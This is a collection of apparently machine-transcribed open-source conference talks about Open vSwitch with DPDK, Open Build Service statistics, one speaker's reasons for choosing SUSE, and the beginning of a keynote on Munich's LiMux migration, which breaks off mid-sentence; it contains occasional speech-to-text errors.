throw interrupt. Interrupt is really good if we want to utilize the CPU, but it's not really good for performance. What dpdk does is it just pulls for the new packet and it just burns the CPU and then try to get maximum performance out of it. It also uses a space. dpdk runs in a user space, so there is no context switch. With VFIO, previously that Markos explained, with VFIO we could expose those NIC hardware into the user space and dpdk tries to access those hardware from the user space and directly write packets into the NIC. So there is no in-between kernel or any middleman. Another thing dpdk uses is a huge page. So with huge page, there is no TLB thrashing. So if we use normal kernel, which we use let's say 4K page, and then we do a lot of DMA and stuff, there might be a TLB thrashing in case of if we have really fast NIC. With huge page we could have let's say 1GB of huge page and it's pretty much enough for a normal NIC. So that's the third problem dpdk solves. Another problem is pthread affinity. In case of kernel, let's say the interrupt receiving core is core 0, but then the application is waiting in let's say core 3. So the interrupt handler need to notify the application that runs on core 3. So which means it's not a cache local. So data was in core 0 and then it needs to go to the core 3. You could, it's possible to solve in kernel as well with pthread affinity and dpdk pretty much does the same thing. Okay, so let's look how OpenVswitch with dpdk looks like. So before the user space data path, it was there in the kernel and with dpdk everything moved into user space now. And we have PMD which is pole mode driver and there are pole mode driver for every sort of NICs. Mostly, I mean they support a lot of NICs actually. So now, now, so it's, so pole mode driver, the OpenVswitch can directly write the packet into the NIC. So there is no kernel intervention. It just directly goes through, goes through, sorry, directly go to the NIC. All right. So if we put together everything, so we have guestOS and we have a dpdk interface and we have OpenVswitch which is compiled with dpdk. So there's the OpenVswitch bridge. All right. Yeah, so the guestOS can now actually, if you do PCI pass through and then we run dpdk, dpdk, so guestOS was technically could directly write it to the hardware. With this case, when guest, there will be not a lot of copies, there will be at least one copy to the OVS, from the guest to OVS. Yeah. Okay, so. Okay, let's show some demo. So first demo would be like, I'll run two virtual machines and I'll run IPer from them. So in the first one, I'll use tap interface for the virtual machines. And then in the second one, I'll use vhost user with dpdk. I'll just show how the performance differ. Let's see. Okay. So this is the first one where I'm running two virtual machines and they are connected with tap interface. All right. So this is how I created those two VM. Okay, we could take some time. Okay, so I started the IPer server and that's the client. So we are getting around two gbps. Let's run it again. So this is what we get with tap interface. I mean, so it's running on my laptop. So if we have really powerful machine, these numbers might be more. So I'll start the second demo where we run virtual machines and I use vhost user for Nick. So when you create interface in OpenVswitch, it creates a socket and we have to give the socket and the chemo so that all the control communication can happen. All right. So all the numbers that we are getting, it could be more tuned. We could use multi queue in the interface or we could use more memory. So these are just normal demonstrations, but it can be tuned to have more performance. Okay, let's see. Well, so it's at least giving more than two gbps with vhost. So yeah, I mean, this number goes like eight or nine, but I think my machine is pretty much hogged. So that's why it's not so high from tap interface, but it could grow more. Okay, so that's demo one. So the second demo, I'll try to show how dbdk can be used to build a normal software switch. So I have two bridge and three virtual machines. So it's so virtual machine one and virtual machine two. We'll try to communicate with each other through IPerf. And I'll connect those two bridge with another virtual machine that runs dbtk l2 forward. So it just takes the packets and for us to another port. So and vice versa. So any packet that coming from bridge zero, it just push it to bridge three and same for the bridge three to bridge zero. Okay. So this is the machine that runs dbtk l2 forward. So good. So there are two vertio based interface that from bridge zero and bridge three. So I'll just assign those interface to Vio PCI so that dbtk could map those hardware register into user space. So we'll try to do that. All right. So this is the application. So it says it runs on like four core and it's not doing any updating of the Mac. And we are giving port mask three. So we have two interface. So if you convert three, so we have. That's why it's three. Let's start it. So even with one extra layer is kind of similar performance like tap interface. So all the packets are going through at another intermediate VM. And this I think is still better than the type interface. And you could see those some statistics. So yeah, that's about the demos. If you guys have some question. Not really fast. I mean, this is kind of similar, but there is a intermediate VM involved. So it's still okay. I mean, all those numbers will be different if we run it on real hardware. These are my laughter. It's pretty bad. Any questions or good clothes session? Okay. Thanks a lot. Thanks a lot for coming. Thank you.
Using OvS + DPDK to boost inter-VM network traffic Improving virtual workloads is a on-going and complex problem. Many of the optimizations are targeting the networking stack which is becoming a bottleneck as the traffic traverses from the hypervisor to the virtual machine and vice versa. As a result of which, improving the components that sit in-between is normally the first thing to look at. One such component is Open vSwitch whcih is a popular virtual switch heavily used in OpenStack. Another component is the Data Plane Development Kit (DPDK). We are going to briefly discuss how these components work and how they can be combined together. At the end there will be a short demo showing these technologies in action.
10.5446/54466 (DOI)
Okay, so OBS in numbers. I will start by introducing myself. My name is Ana and I'm working in the OBS frontend team. Let's start with a short introduction about OBS. The service is a generic system to wild and distribute binary packets from sources in an automatic, consistent and reproducible way. Now I'm going to talk about the numbers from our public instance, build.opensuicide.org. That is what probably all of you or most of you use. So that's today numbers or some days ago numbers and we have 46,891 users, 46,292 projects, 470,118 requests, 794,210 reviews and 44,219 comments. So yeah, quite big numbers. And then let's talk about some more interesting data. Then users. So I already say that we have 46,891 users, but that is how it looks over the time. So yeah, we already see here that over this period there were like more users. Maybe it's easy to see here. Here the points are the number of users that were created every month. And then the blue line is for being able to see it without the points far away. So the regression of the points. So we can see some interesting things here. Then we see points over here that some months we have more than 80 new users and then we have zero or almost zero users some months. And then yeah, you see this that I already mentioned in the previous graph. You could say, yeah, then we have many new users at some point, but now doesn't seem that we have that many users. It could be that OBS is not that popular anymore. Yeah, OBS is great. So of course not that is something we can explain. It is related with the diffusion of innovation theories that basically is for all new software, but in general any product. So it's how people get used to a new tendency in the market. So basically have the innovators that are well educated with more source of information and are also more open people than the early adopters. They have also a lot of source of information and are popular and social leaders that are followed by the early majority that is more doubtless about using new technology, but that also join. Then we have the late majority that is more not that innovate. They don't like new techniques that much, but when most people have joined, then they also join. And at the last point we have the laggers that are basically the people that joined because everybody was already there. So this is the Gaussian function. And if we go back, we can see that we also have it here. So when the product was basically new after that, there was no innovation or not that much innovation anymore and that's why the number of users keep more or less stable. So it's not that we are doing anything wrong or OBS is not popular. It's something normal. So now the request. Yeah, I already saved 470,181 requests and as a curious information, the average time for a request to get accepted is 140 hours or something less than six hours. Yeah, of course, can be some months for some project packages and maybe a few minutes for some others, but yeah, that's the average. And yeah, what percentage of our request would accept it, not all of them, but most of them, 77%. And yeah, also the next percentage that we see here, painting it by state is supersede. So that means that they were not also close, but that we keep working on it. So it's also quite good. And then we have also some revoke and decline, but that's our more or less the bad ones, but we close them, but it's not that the big number. And then we also have the new ones and the review ones that are the ones that are open or in process now. That was the number is that is low because there's the data from some days ago. And then we have the deleted ones that yeah, currently only admins can delete them. So probably was like that from the whole history of OBS. And that's why we don't have many delete requests. So now let's move to the collaboration activity. How much people collaborate inside of OBS? Yeah, that's the total activity over time. So the first time I saw this graph, I thought, okay, why it has this shape and why I don't know if you see it, I will put another graph where you can see it better later. But this picks here. Yeah, they why are they there? So my first guess was that maybe the main projects affect this graph. Yeah, and we see that they affect maybe the shape because we are all of them seems to be a combination between a linear and an exponential function. And every time we have more and more projects, so it makes sense that that was give it the shape, but we don't see any peak or in any of the main project like back to me that is the biggest one that can cause this here. Okay, then I thought, okay, maybe then their releases are affecting this graph. But I painted and also like doesn't seems to affect the graph any or at least not only that cannot only be the only reason for the peaks. So I think, okay, what can that be? Then I find the number of active projects. I mean, a small or medium project or also the big ones, but the number of projects that are active even if they are really, really small. And you paint it with the total activity, you already can see that more or less that where there are peaks in one of them, they are in the other. I wanted to show to you it properly. So I derivative the function on top. And then you already here, you can see that everything here, there is a peak, there is a peak in the other one. Yeah, I calculate the correlation is really, really high, 0.85. So maybe it's not the only reason, but at least it's the most important reason why we have the, like our collaboration activity get increased is the number of projects and not the biggest project. So I found it quite curious. And then, yeah, there is something else that, yeah, cuts your attention because there was something that cuts my attention and is that there are no holidays. So probably the obvious user would look something like this because, yeah. Okay, and yeah, now let's talk about the hardware we have for the Sternas instance. Yeah, I read some days ago that human brain can store one between one and then there are bytes and in every something that three. So then I will tell you in human brain so you can remember it better. So we have 15th terabytes for the source server host, so around five human brains. We have for the four repository server host, the first one that is for the distribuctions. It has 19th terabytes, so around six human brains. Then the home projects is 10th terabytes, around three human brains. Then states that is for testing and open QA and so on, so only around one human brain. And yeah, then we have the rest and that is seven terabytes, so around two human brains. And then we have 10 schedulers architectures that are all of those you see here. Yeah. So now workers, we have 178 hosts and then 1180 workers and you can also see it for architecture. So for example, here for this one that is the biggest one, we have 124 and then 841 workers. So now the system. So the source activity per day, we have OSD check-ins around 2300. In the user interface that is only 600, so much less, so most people is using OCC for that. And then we have around 300 branches. That is also quite a lot because that is only for one day. And now here we have the binary activity by will type. So yeah, the numbers are the same ones I already mentioned in total, but just you can see when they fail, success or unchange. And change basically means that it was built and also success, but this result didn't change, so it was not update. And then here that it seems to be zero is not zero because you could think, oh, the distributions never fail. No, they also fail. But I don't remember when the number was 98. So 90 is comparing it with 50,000 is not there. So yeah, we can see some curious things like the staging is the less that the one that less fail comparing with the rest. And yeah, and then the distribution is the one that more change that when we will it, we have to update the result because it was changed. So yeah, curious. And then some data that we have in obvious so that you can access it now or when you want is yeah, we have a statistic from the last bill for every package. For example, for this route that is for our obvious instance in obvious, we have yeah, how long take to install the package 31 seconds. I mean, built a task was yeah, and they use this space. Yeah, some information you can check. And also in our main page, we also have the system status. So the number of build jobs during the last week. And it also tell you here how many build host packages are waiting and so on. And then in our monitor page, you can also see how many workers are building here in this one, how many workers are building dead down the way and so on. And also here, how many packages are waiting for being built or how many are blocked. So the first thing you see here when we select here one month is this thing here that was probably some of you will remember that obvious was down several days around two weekends ago. So that's why we have this here. And also you can see I didn't calculate it, but I think it's really obvious that this you see the number of workers building so the green part in the top. You can also see that there's some relation here with this graph. So yeah, it makes sense. The number of packages that are waiting for building are more or less the workers that are building because yeah. So yeah, and if we want to see it for a long period, we have here one year and then something we can see for example here we have more workers that's because new machines were built and then also here the number of workers was decreased just because some of them were turned off. And you can also see things like here this one. That's Santiago Borog, obvious some days ago. Yeah, hi Santiago. Yeah, then you see here that there were less things working because obvious was broken because Santiago broke it. Yeah. And now let's talk about our project in GitHub. We have 125 contributors in the whole history of obvious 32 in the last year. So yeah, quite a lot. And then the number of pre-request merge. Yeah, you can see that in this period they were not for requests and then they start like crazy. So yeah, push to master basically. Yeah, since more or less two years ago, we at least in the front end thing we start working with for requests and although the back end still keep working without them, that's why at the beginning you see like, okay, no pull request at all because they didn't just push to master. And then you see the code frequency. In the second part, you can see some relation with the previous graph, but yeah, in the first part there was also some activity, although there were no pull requests. And also the code frequency doesn't match exactly the pull request because as I said, the back end is also in the same repository and they are not using pull requests. So that's why these two graphs look quite different. And yeah, this is the commit activity from the last year. So it is per week. That's why it oscillates that much because depending on the week there are many or less commits. You may wonder what is that? I take the data at the beginning of this week, so this week we're not commit. That's why it seems that this week we didn't do anything. So if I take it now, then it will look nice. And now the code here is also include other things related with OBS like O is a C that we will see like in the lines of code later we also have Python. Yeah, this is the total lines of code. We have 282,192 lines of code. Although you see that not everything is code lines. You have also 12% of blank lines there and 11% of common lines. And then here the lines of code by language. Yeah, as I said before, we are also taking here in token OCC, not only the GitHub repository from OBS, that's why we also have Python. And then the Mali Ruby that is the frontend, where for the back end and then some other languages over there. And that was all. But there is more. And then the talks from other people also related to OBS, then beyond will hold here his talk when I finish. Then you also have Simon and Adrienne talk followed by a workshop about app image and I get packaged into package.gov by Wolf1 that he had his talk yesterday and he will continue with the workshop today. And then take me to live by Excel. And yes, two more, two more, packaging workshop by Simon and replaceable files discussion by Bernard. And that was all. There are any questions? No? Great. Because I'm here to talk about my cat. If there is a questions in the bot, I'd be cool to answer. OK, let's see how well I'm convincing. OK. It works very well for me. Yes, Sweet Moe. Look for the chat. No. No. No. Chess is better than the Hill.
In this short talk, we will present to the community the data that we have about usage of the OBS. This data show a clear trending in the user behaviour, and is used currently to make important decisions about our future as a Free Software project.
10.5446/54468 (DOI)
All right, now I'm going to take advantage of your hospitality and I'm going to give you a softball talk. So my name's Thomas Hatch. I'm the CTO of Saltstack. And so I'm giving a keynote tomorrow. I usually have to give a lot of very technical talks and very in-depth and visionary talks. And I never get to give a talk for fun. And so I presented or, sorry, I submitted a softball talk and probably just because you're being nice to me, you let me get up here and talk about it. Basically what I want to go through is how I introduce modern Suza to people. Because I have some strange looks, I will admit, when people ask me what Linux distribution I'm running and I go, well, Suza, of course. So let me kind of just talk through some of these things. And I noticed that there are other talks that use a Dr. Strangelove reference in the title. If you haven't seen the movie, Dr. Strangelove, it is absolutely hilarious. Okay, so it all started with a guy named Bo. So I get this email from Bo almost two years ago. And he says to me, Suza is going to start using the ever-loving crap out of Salt. And my response was, so? You're Suza, I don't care. That's honestly what I thought. And so a little later, honestly only a few weeks later, what I ran into was that we needed to reinstall the base operating systems on one of our test environments in our QA lab. And I thought, well, I have to at least look at Suza and I have been deeply offended by a certain other enterprise Linux distribution lately. And so I started to look at Suza. Oh, I have a picture of Bo. If any of you don't know Bo, this is what he looks like. Okay. That's actually how I honestly describe him to people, big nose. All right. So I had to put a couple of my old Suza biases aside. And a lot of this came from honestly one of my biggest old Suza biases is that I felt like you did set up the Apache configs in a weird way. That bothered me. I've gotten over that. And so this is also, this is the main thing that I ran into when I start talking to people about Suza. Again, I'm from the United States where things are kind of crazy over there right now. And so I'll admit Suza is not a very popular distribution in the US. And so I usually get this kind of kickback. Ironically, even though I'm in Utah and you guys have some ties over there for better or for worse. Okay. And I will have to admit on the third point, I kind of like Yast now. I'm almost embarrassed to say it. It's really convenient. Okay. So the main thing that started to change my mind was how open Suza changed their approach to releases. Again, right after Beau sent me this email, I go to the open Suza website and go, okay, I'm going to take a look at open Suza. And I was unaware of the whole leap tumbleweed thing that was going on. And the big problem that I generally had was I'm an old Arch Linux guy. I love Arch Linux. I used to be an Arch Linux package, et cetera, et cetera. But in the data center, I would always use CentOS. I wouldn't use anything other than CentOS or anything related to CentOS, just CentOS. And I found it frustrating that I lived in this two distribution world where I felt that I needed a completely different distribution for my laptop than I needed for my servers, whether they were in the data center or at my house. And upon learning about Leap, I got really excited about this because all of a sudden I can use a rolling distro because six-month distribution releases are silly and dumb. So hooray, I can use a rolling release. But also, I've got a completely free operating system which is more than sufficiently stable to run the vast majority of my server needs. And so I like to compare this to using multiple programming languages. We already had a little trolling from Joe earlier if you were in this room about using multiple programming languages and how that's morally wrong. And I agree with other commenters that the solution is not more Perl. It's less Perl. I'm not a big Perl fan or Java, sorry. But then again, I would endorse the use of Julia. If anyone's used Julia, it's brilliant. I'm not serious. But in programming, often we do have to say we're going to use something like Python for high level, get a lot of stuff done, prototyping, and then have C so that we can optimize performance where we need to. And I didn't like having the same problem inside of my operating systems. And that's a really strong selling point for people to be able to explain how well tested Tumbleweed is. Tumbleweed is beautiful. Is Richard Brown in here? Oh, that's good. Okay. Yeah, Tumbleweed is beautiful. All right. And so I began to feel that this idea, this concept of a rolling release plus an enterprise release in the overall way that as soon as it develops software, develops the operating system and pushes it out, was far and away the optimal mechanism. And again, I felt that this six month release cycle concept is, well, I think it's a waste of a lot of people's time. Okay. And then the benefit I felt is that the enterprise software existed in the right place, that it was the right type of upsell and the right type of ramp to get somebody moving from certain environments on a rolling release, certain environments on LEAP, certain environments on SLEZ. And I felt that was a lot smoother. Now, I don't remember who wrote this blog post, but someone from SUSE wrote a blog post about how SUSE makes decisions and then commits to them. Was that you, Joe? I really didn't mean to compliment Joe. Actually, it was a really good blog post. And this is something that really struck me because coming from a certain other distributions whose names may or may not appear on this slide, I'd become very frustrated with things kind of flopping around. Should I be using Xan, should I be using KVM? Is ButterFS still going to work in 6.9, et cetera, et cetera? And I began to really appreciate SUSE and the fact that they still put up with RiserFS, for instance. Good job, guys. I think RiserFS was very brilliant for its time. Obviously not quite brilliant enough. Now, all right. So the next major problem that we're running that I feel is very important from the perspective, particularly deploying inside of a data center, has to do with the ability to backport software packages. So let me go back to the story. We're at Solstack, we're determining what distribution to use underneath a new cloud deployment. And it was a pretty small cloud. And so we go, well, we'll just use Open Nebula, get this thing up and going pretty quick. Doesn't need to be complicated or fancy. And we start to install Open Nebula on SUSE. And I told one of my engineers, OK, we're going to try SUSE. And it was Tuesday, and I said, if it comes to Friday and you're frustrated and mad, we can back out. Because no one in the company had ever used SUSE at this point. This engineer is named CR, wonderful, wonderful man. He comes back to me on Thursday, and I'm fully expecting him to say, yeah, Tom, that's the SUSE garbage. And he comes and he walks into my office and he starts talking to me about something completely different, right? And I ask him, hold on, hold on, hold on. What about the server deployment? I mean, weren't you doing this? Why are you asking me about code? And he says, oh, no, I'm done. So everything's OK? Oh, yeah, everything's fine. I'm like, so did you use SUSE? He says, yeah, yeah. And it was really interesting because at that point, again, it had been two days, he's in my office, and he says, not only have I reinstalled all the servers, but I mean, there's no more Ubuntu on my laptop. I'm running Tumbleweed. I have been converted. And the thing that did it for him was OBS. And he stayed for Snapper, but more on that later. But the thing that did it for him was OBS because he started to deploy Open Nebula, and the Open Nebula packages he could find for Open SUSE were horribly out of date. And this is a showstopper a lot of the time that it becomes very, very difficult to say, ah, nuts, you know, I really wanted to use this particular piece of software. But just because the vendor doesn't happen to be all over it, I'm going to have to go through the trouble of building my own packages. But you guys have OBS. Thank you. I don't have to build a local package, build environment, the shrewt stuff. Thank you. And so he's in my office, and he says, oh, I just tweaked a couple of existing RPMs, put them on OBS, and we were done. They built in a few minutes, and we were able to deploy our cloud. So thank you for OBS. Thank you for being brilliant and building that. I'm not actually going to badmouth anything else from the stage, apart from a certain other build system fills me with rage. Okay. Finally, talking a little bit more about Tumbleweed, there's an old joke in the Arch Linux community. Has anyone in here ever run Arch Linux before? Okay. Okay, I'm going to assume the number is actually higher in that most of you are just afraid to admit it in this room. So the old joke in the Arch community is something's broken, so I'll just update in a few days and that'll go away. Sure, something else will be broken, but at least this problem will go away. The Arch isn't only a rolling release, and don't get me wrong, I still adore Arch. Arch isn't only a rolling release, but it's kind of like a wheel that every time it turns, it's flat in a different place. I was astonished by how thoroughly Tumbleweed gets tested, and as an Arch package, I was very aware of the amount of effort that certain Arch packages put into their packages. Wasn't always quite to the same level as the Tumbleweed project to put it as kindly as I possibly can. It was rather reckless. One of the main reasons I love packaging salt on Arch Linux is because if there's ever an upstream issue with a dependency in any plausible or conceivable way, we will find out about it in Arch very quickly. All right. So the ridiculously thorough amount of testing is something that I'm very, very grateful for. So in the old days, when you would install a Unix-style operating system, and if you install FreeBSD, who here has installed FreeBSD in the last year? Oh, very nice. I haven't installed it in the last year, so I'm running on like two years ago on this reference, but so I apologize if I'm wrong. Don't get after me. Okay. So if you install FreeBSD, you can still install it with slices or partitioning it in the classical Unix way, right? You've got your var, subdirectories, isolated, et cetera, et cetera, so that if something logs like crazy, everything's fine, right? One of the things that blew me away just installing, Suza, was how meticulously well the butter FS deployments are laid out, that they are very carefully thought through, that they are by default matched with the packaging and deployment and configuration options, and how they line up the right copy on right style, et cetera, et cetera, all of the right flags are there for all of the right butter FS components. And I was just very impressed by that. And then the next thing that I found astonishing, this engineer CR I told you about came up to me a couple of months after we deployed these systems and asked me if I had ever used Snapper. At that point, I hadn't heard of Snapper yet. After I was introduced to Snapper, I actually sent, I think I sent Bo an email saying, so I've learned about Snapper and OpenQA and OBS, what are their magical Suza things am I missing? And he introduced me to quite a few more. Like OSC. I love the OSC command line, by the way. I don't really know that those guys would ever need to rewrite that. Sorry, for those of you who weren't here, that's what the last talk was about. Okay. I became instantly infatuated with Snapper. I mean, this thing is cool. To the extent that I started purposefully doing all sorts of crazy things to break my laptop because all of a sudden I felt far more liberated than I had ever been before. And then thoroughly enjoyed just booting into an old snapshot. It was excellent. And all my problems went away. I can install all of those third party repositories. You know the ones that you install but you don't tell anybody about, especially Richard Brown because he gets all upset. He's still not here, right? Yeah. And then the ability to just boot into the past so seamlessly. And so similarly, I was thoroughly impressed by the fact that Snapper ran automatically, right, whenever you ran Zipper or Yast, that I built Snapper support directly into Salt's configuration management runtime so that every time you're in Salt, you can snapshot back. As the first time and still when we get customers who come to us and they say, well, we want we want full rollback. And we explain to them that that's a myth unless you install Suza. Okay. Oh, I already mentioned this because Joe brought it up in his excellent blog post. But Suza sticks it out and they seem to have very good judgment because they chose Salt. I'm not biased. Okay. But yeah, I did mention this before. But Suza sticks it out. My dad, back in the late 70s, spent a few years living in Germany. And so he would tell us stories growing up about the Germans and how they are different and fantastic in very specific ways. And one of the things that he would say is that Germans will take a long time to make a decision because they want to make the right decision because they don't want to have to back out of that decision. Now, I don't know how true that is. I'm generally under the impression that's true. Interfacing with you lot. You seem to take careful, wise decisions and then stick with them. But again, this is something I've deeply grown to appreciate in the way Suza is engineered and also in the commitments that Suza makes to its customers and its users. I feel much safer over the long run with Suza than I do with other operating systems because I mean, I know that, you know, you guys are going to make mistakes. That happens. And I'm very forgiving of those mistakes. But having that long-term confidence is something that I really like. The fact that I feel very comfortable that if Suza says you should use software X, that they're not going to back out and change that decision on me really soon. Yeah. And thank you for not using Upstart. I deeply appreciate that. Have you ever tried to automate Upstart? Okay. So, in a nutshell, this is my pitch when people say, what distro are you using? And I say, Suza, duh. And they give me that funny look like I'm a madman. And they want me to like use some things. It blows my mind because they say, what linuxes are you using? And I say, I'm using Suza, of course. And they give me this look like, seriously, like I'm crazy. And then I ask them, what linux distribution are you using? And they're like linux from scratch. And it's, who's the crazy guy? Or they say something like, we deploy production servers on Fedora. No. I actually worked for a company that did that. And it worked out great all the time. It was the government, the US government. They were brilliant. Actually, it was part of the US intelligence community. Ironically, the sides you don't hear about because they do their job right. Okay. So Suza has the best release policies and release cycles. I'm not, I feel like I can back that up with more than just opinion and hyperbole. The world of open source is a rolling world. Not having a rolling release that is stabilized means that your users must always be behind the curve. And Tumbleweed solves it in a way which is infinitely more elegant than any other rolling release. Having an open source release which is stable enough to run in a server environment, I believe is an extremely important aspect of a linux distribution. And deploying that piece of software in such a way that enables users to get to know Suza and get to know what an enterprise and an extremely stable Suza environment feels like is a smart business model to help drive revenues. And that's another thing that impressed me about Suza is that unlike all but one other linux distribution, you guys are profitable and growing. And I've become increasingly wary of trusting open source software which seems to be on a revenue dead end. And a lot of it is. A lot of it is. Certain pieces of software which have an extremely high amount of hype and have raised hundreds of millions of dollars make no money still. And it's terrifying and it's making it hard to raise money. It's getting easier now for us because we make money. It helps. Okay. So OBS is brilliant. And again, that's a huge part of that pitch. Is to emphasize that. So when I introduced Linux operating systems to somebody, I say, look, the most important part of a Linux operating system is its packages and its package manager. That is the core of the operating system. And how well those packages and its package manager are managed is a direct reflection on the quality of the distribution and the quality of the release. And you guys are doing that right. It is not a cumbersome mess unless, well, Joe was explaining that it's got Pearl in the background, but whatever. I can overlook this. Because I endorsed Julia earlier. Okay. Let's see. Open QA is amazing. Your packages are brilliant. Your release policies don't suck. You solve the two distribution problem. You guys stick to your guns. And it took me a long time to admit that Pac-Man was no longer the world's best package manager. I think it's zipper now. So in a nutshell, thank you for making such a fantastic Linux distribution and for making my life using Linux easier. And Richard Brown is absolutely fantastic. All right. Any questions, comments, arguments, rebuttals? If anyone honestly wants to argue with me, then that would be great. Since I just told you, you're the best. Yes. What feature requests do you have? As much as you love what Oat Suze is doing and what Suze guys are doing, helping out, etc. What's the itch that you would love scratched? In all honesty, I'm not sure. Mostly because you take such darn good care of my software that I write. We could probably see a few more IDEs packaged. But I use K-Develop. So I know my credibility just went down. That's German, right? Okay. Any others? Yes. Yeah. First of all, thanks for this brilliant talk. I'm sorry I have to reign on your parade. I can agree to many points and maybe it's just because I'm still on my journey and only halfway there. I have a redhead Fedora background as well. So I joined Suze last year. You are already one year ahead of me, basically. You have two years of Suze experience, right? About one. Okay. I will admit when I introduce Suze to people, I do introduce it to them and say something along the lines of, Suze is brilliant as of about two years ago. Okay. The only thing that I cannot agree on is build systems because basically all build systems suck. There's just some build systems that suck less than others. And my question is, what sucks so hard about Koji? So in the defense of Koji, I haven't used it extensively for a few years. Mostly it was user interface being very, very cumbersome. But my, and also that their entire build chain and supply and package management chain is spread across a lot of different areas. But again, I haven't done a lot of work with the Red Hat build system in a few years. So that's also why I probably shouldn't have said anything negative about Koji. Setting it up as a nightmare, but I'm sure setting up OBS isn't a walk in the park either. Okay. I will happily rescind the stage.
A little over a year ago I found myself doing the Distro Dance. Trying to decide which Linux distro to use for a new datacenter deployment. I was starting to question my old solid choice, CentOS, and decided to go with SUSE. Join me as I go over my journey to SUSE, and why I am now convinced that it is the best Linux Distro out there today. Also see how I am convincing people to switch to SUSE and abandon the old ways of Linux for the chameleon.
10.5446/54471 (DOI)
We have the keynote speaker, Matthias Kirschner. And he is the president of FSFE's Free Software Foundation Europe. And he is going to be speaking a little bit about open source software and public administration and briefly touch on Munich's decision to revert back to proprietary. So please welcome him to the stage. So hello everybody. I saw that there was a long queue, so I guess some people will join us a little bit later. Thank you very much for the invitation. Before I start, who of you was already involved in SUSE in the 1990s? Anyone here? Okay. So in 1999, I was facing a problem at home. I had two computers in two different rooms and they were connected with an Ethernet cable. And I somehow got the idea that it would be really nice to write an email from one of the computers to my brother in the other room. And also both of those computers had email programs installed. I was not able to accomplish that without connecting with the modem to the Internet. And then I complained about that in school. And a friend of mine, he said, well, I have something for you. And he brought me some SUSE floppies and CDs at that time and said, with that you can achieve it. It took me several hours to install that and then to see some white font on a black screen and some more hours till I had a graphical user interface. And I had to learn lots and lots more during the next months until I was able to set up a mail server for the local network. But yeah, that got me started in free software. Later in 2004 I joined the FSFE. So those of you who were already involved in that time, you are partly responsible that I'm here today. So thank you for that. And to the ones, to all the rest of you, I thank you for helping others nowadays to join the free software movement. So yeah, I was invited to talk about the Lemux project and the status of it. I will briefly tell you a bit about the history of the project. And then I will raise a lot of questions. And I hope that you will go with more questions than you came. And afterwards I will give you a short example of what the FSFE will do in the future and the public administrations. So first of all, where did, how did the Lemux project start? In the early 2000s, public administrations had the problem that the support for Windows NT for Workstation ended. Little bit like nowadays, a lot of administrations had that problem with Windows XP. So they had to upgrade their systems. And Munich thought that this is a good opportunity to evaluate if it's the best way to check and just continue and upgrade to a newer version of Microsoft or if there are other options. So they did an analysis of that and came to the conclusion that Linux would also be an alternative to switch to. They had long debates, lots of discussions and evaluation about that. At one point and also the at that time CEO of Microsoft, Steve Palmer, he made a break and his skiing holidays came to Munich, talked with the mayor to convince him that they shouldn't do this step. Still in 2004, the city council in Munich decided to switch to free software operating system, their Lemux client for their workstations. So that was the start. But then already a few weeks later, they stopped the project. Why? Because there was the fear that software patents might be a legal problem for Linux systems and maybe because of that they should not switch to a free operating system. They then had an analysis of that problem again. And the outcome was that it's not a bigger problem for them if they are using free software than proprietary software with the software patents. So they decided to continue. But that was the beginning of regular rumors about the stop of the Lemux project. It regularly came back. So one of those reasons why they stopped or why there were rumors about them stopping the project was often connected with costs. So there were times when people argued that the project is more expensive than if they would run a Microsoft operating system. So the CSU, which was at that time in the opposition, they filed requests to show how much exactly they are saving with that or if it wouldn't be more expensive. The IT committee at that time, they made an analysis and came to the conclusion that they are saving 20 million with their project. But then there was another time when there was a study by HP and they said Munich would save 40 million euro or 43 million euro if they would switch to Microsoft Windows for their operating systems. They didn't publish that study for quite a long time. And in the end, it also turned out that Microsoft paid for this study. But things like that, the connection with the cost was a regular thing where people said, oh, it's too expensive. The project will stop. They will switch back to Microsoft Windows. Another reason which regularly came was the dissatisfaction of their staff, their users with the system. So there were always reports that the users, they are unhappy with their IT. They are not happy with the Linux client. Sometimes there were numbers like 20% of the people there are absolutely unhappy. Sometimes it was that 40% of the people there were unhappy with the system. But it was always something which was very sketchy, the public news about that. So it was never clear what exactly they were unhappy about. They had some internal reports, but they didn't publish them. So they were unhappy with some components, but you didn't know about what. And if they were connected with the Linux client or with some other components of the system, there was also never a comparison in the news how those satisfaction rate is connected to the satisfaction of users in other public administrations. I mean, if in other public administrations 50% of the people are absolutely unhappy, then 20% would be a good number. But there was never a comparison like that. So regularly it was reported that people are unhappy and because of that they are stopping the project. It was also sometimes not clear where this, if this unhappiness for example could come from the organizational changes they made at the same time. So when they started the process to switch to the Linux client for the workstations, they also started to do organizational changes in their structure on how the IT works. So before, people had their IT guy at the desk or the office next to them and after this structural changes, when they had a problem, they were just one ticket in the ticket system. That's also something which gives people the impression that it's not so good as before. But yeah, it regularly came back. People are unhappy. That's the reason why Munich will now stop and switch back to Microsoft Windows. Another reason which is also often, which was also often noted was that Munich will switch back to Microsoft Office because of interoperability reasons. So they had the problem that other public administrations were often still using Microsoft Office and were sending Microsoft Office documents to them and they had a problem to process them. And even at that time, the federal government was sending proprietary documents to the city of Munich and asking them to fill that out for certain things. Also at that time already, the federal administration in Germany, they had a decision that every federal administration should be able to receive, to edit and to send back ODF documents. But it's very difficult, of course, and also connected with the example before with the unhappiness of the users, that when you try to tell your users that it's the others fault, when all the others around them tell them it's your fault. So it's a very tough place. But yeah, that was something which regularly pushed the rumors that they have to switch back and the project will fail. And then there was another reason which was nothing. So I had the impression that when there weren't any news about Linux for some time, people said, oh, I heard that they are now switching back to Microsoft Windows. So from my experience, that also happened. Still, despite all those challenges, they have been able to finish their project in 2013. So they have been able to migrate 15,000 workstations to their Linux client. And beside that, they have also been able to migrate a lot of templates and unify those, all these office templates. They also published a software to take care about this template management and Walmux software. So yeah, they accomplished that. And of course, such a migration, it's a very tough process. With all the organizational changes, they also were doing and then switching an IT system, which before that was depending a lot on the software of a few vendors. In this process before, they always had the support from their mayor and from the political leadership, Christian Ude, at the time, the mayor, who started the project also in 2004. So whenever there were complaints from other departments, at least they know that the leadership will somehow support what they are doing and whatever they are facing, they get some moral support. But that changed in 2014. There were new elections and then the mayor before, he didn't run again. And then after the re-election, there was the SPD, which was also the party of the mayor before and CSU, they made a coalition and are governing now together. And the new mayor is Dieter Reiter, who is also from the SPD, but he was already before that not a big fan of the Linux project. He was in some newspapers before quoted as Microsoft fan and he also had that, he was also very proud to say that he was, he had an important role that Microsoft was moving their headquarters to Munich and he was very involved in that, he claimed. So from that time on, it seemed that Linux was somehow the scapegoat for everything. So that started with things like the new mayor from the CSU, he bought an iPhone and wanted to connect that to the mail servers, which were not supposed to be connected with iPhones at that time. So whose fault is that? The Linux client, of course. Then there was a mail server outage, what did the media report? The media reported that Dieter Reiter, the mayor 